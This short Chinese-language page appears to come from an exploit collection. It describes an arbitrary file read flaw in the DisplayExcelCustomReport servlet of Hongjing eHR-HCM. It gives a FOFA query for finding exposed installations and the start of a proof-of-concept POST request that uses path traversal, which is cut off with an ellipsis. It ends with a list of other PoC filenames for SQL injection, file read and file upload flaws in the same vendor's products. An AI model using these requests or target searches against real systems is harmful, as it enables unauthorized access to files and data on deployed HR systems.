##宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞 ##fofa ``` app="HJSOFT-HCM" ``` ##poc ``` POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1 Host: User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom...
宏景DisplayFiles任意文件读取.md 宏景HCM-codesettree接口存在SQL注入漏洞.md 宏景HCM-downlawbase接口存在SQL注入漏洞.md 宏景HCM-pos_dept_post存在SQL注入漏洞.md 宏景HCM系统fieldsettree接口存在SQL注入漏洞.md 宏景HCM系统infoView处存在sql注入漏洞.md 宏景OA文件上传.md 宏景eHR-HCM-Displ...